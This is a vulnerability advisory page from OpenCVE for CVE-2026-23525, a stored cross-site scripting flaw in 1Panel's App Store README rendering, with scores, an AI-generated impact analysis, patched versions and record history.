Description
1Panel is an open-source, web-based control panel for Linux server management. A stored Cross-Site Scripting (XSS) vulnerability exists in the 1Panel App Store when viewing application details. Malicious scripts can execute in the context of the user’s browser, potentially compromising session data or sensitive system interfaces. All versions of 1Panel up to and including v1.10.33-lts and v2.0.16 are affected. An attacker could publish a malicious application that, when loaded by users (locally or remotely), can execute arbitrary scripts. This may result in theft of user cookies, unauthorized access to system functions, or other actions that compromise the confidentiality, integrity, and availability of the system. The vulnerability is caused by insufficient sanitization of content rendered by the MdEditor component with the `previewOnly` attribute enabled. Specifically, the App Store renders application README content without proper XSS protection, allowing script execution during content rendering; and similar issues exist in system upgrade-related components, which can be fixed by implementing proper XSS sanitization in the MdEditor component. These vulnerabilities can be mitigated by applying proper XSS protection and sanitization when rendering content in the MdEditor component. Safe versions with a patch incorporated are v1.10.34-lts and v2.0.17.
Published: 2026-01-18
Score: 6.4 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Stored Cross‑Site Scripting enabling cookie theft and unauthorized system access
Action: Immediate Patch
AI Analysis

Impact

1Panel is an open‑source web‑based control panel for Linux servers that offers an App Store for installing applications. A stored Cross‑Site Scripting vulnerability exists in the App Store when viewing application details. The flaw arises from insufficient sanitization of content rendered by the MdEditor component with previewOnly mode enabled. An attacker can embed arbitrary scripts into the README of a malicious application; when a logged‑in user views the details, the scripts execute in the victim’s browser context. The result is the theft of session cookies and potentially unauthorized access to system functions, thereby compromising confidentiality, integrity, and availability. The likely attack vector is inferred as a malicious application published to the App Store, which the vulnerability does not explicitly state but is derived from the description.

Affected Systems

All supported releases of 1Panel up to and including v1.10.33‑lts and v2.0.16 are affected. The vendor supplied patched releases are v1.10.34‑lts and v2.0.17.

Risk and Exploitability

The CVSS score of 6.4 indicates moderate severity, while the EPSS score of less than 1% demonstrates a very low probability of exploitation. The vulnerability is not listed in the CISA KEV catalog, suggesting no widespread attacks have been observed. Exploitation would require a malicious application to be published to the App Store and subsequently viewed by a logged‑in user; this is inferred from the description. Successful exploitation would allow an attacker to steal credentials or perform privileged actions from the victim’s browser session.

Generated by OpenCVE AI on April 18, 2026 at 19:06 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade to v1.10.34‑lts or v2.0.17, which contain the fix for MdEditor sanitization.
  • If an upgrade cannot be performed immediately, block the installation of new applications from the App Store or disable the App Store feature until the patch is applied.
  • Verify that MdEditor is configured to enforce proper XSS sanitization for previewOnly rendering, or apply the vendor’s patch to enforce this behavior.

Generated by OpenCVE AI on April 18, 2026 at 19:06 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Fri, 13 Mar 2026 14:30:00 +0000

Type Values Removed Values Added
First Time appeared Fit2cloud
Fit2cloud 1panel
CPEs cpe:2.3:a:fit2cloud:1panel:*:*:*:*:*:*:*:*
Vendors & Products Fit2cloud
Fit2cloud 1panel

Tue, 20 Jan 2026 21:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}

Mon, 19 Jan 2026 09:45:00 +0000

Type Values Removed Values Added
First Time appeared 1panel
1panel 1panel
Vendors & Products 1panel
1panel 1panel

Sun, 18 Jan 2026 22:30:00 +0000

Type Values Removed Values Added
Description 1Panel is an open-source, web-based control panel for Linux server management. A stored Cross-Site Scripting (XSS) vulnerability exists in the 1Panel App Store when viewing application details. Malicious scripts can execute in the context of the user’s browser, potentially compromising session data or sensitive system interfaces. All versions of 1Panel up to and including v1.10.33-lts and v2.0.16 are affected. An attacker could publish a malicious application that, when loaded by users (locally or remotely), can execute arbitrary scripts. This may result in theft of user cookies, unauthorized access to system functions, or other actions that compromise the confidentiality, integrity, and availability of the system. The vulnerability is caused by insufficient sanitization of content rendered by the MdEditor component with the `previewOnly` attribute enabled. Specifically, the App Store renders application README content without proper XSS protection, allowing script execution during content rendering; and similar issues exist in system upgrade-related components, which can be fixed by implementing proper XSS sanitization in the MdEditor component. These vulnerabilities can be mitigated by applying proper XSS protection and sanitization when rendering content in the MdEditor component. Safe versions with a patch incorporated are v1.10.34-lts and v2.0.17.
Title 1panel App Store vulnerable to Cross-site Scripting
Weaknesses CWE-79
References
Metrics cvssV3_1

{'score': 6.4, 'vector': 'CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H'}

Subscriptions

1panel 1panel
Fit2cloud 1panel
cve-icon MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-01-20T20:07:16.229Z

Reserved: 2026-01-13T18:22:43.980Z

Link: CVE-2026-23525

cve-icon Vulnrichment

Updated: 2026-01-20T20:02:47.910Z

cve-icon NVD

Status : Analyzed

Published: 2026-01-18T23:15:48.220

Modified: 2026-03-13T14:29:08.653

Link: CVE-2026-23525

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-18T19:15:10Z

Weaknesses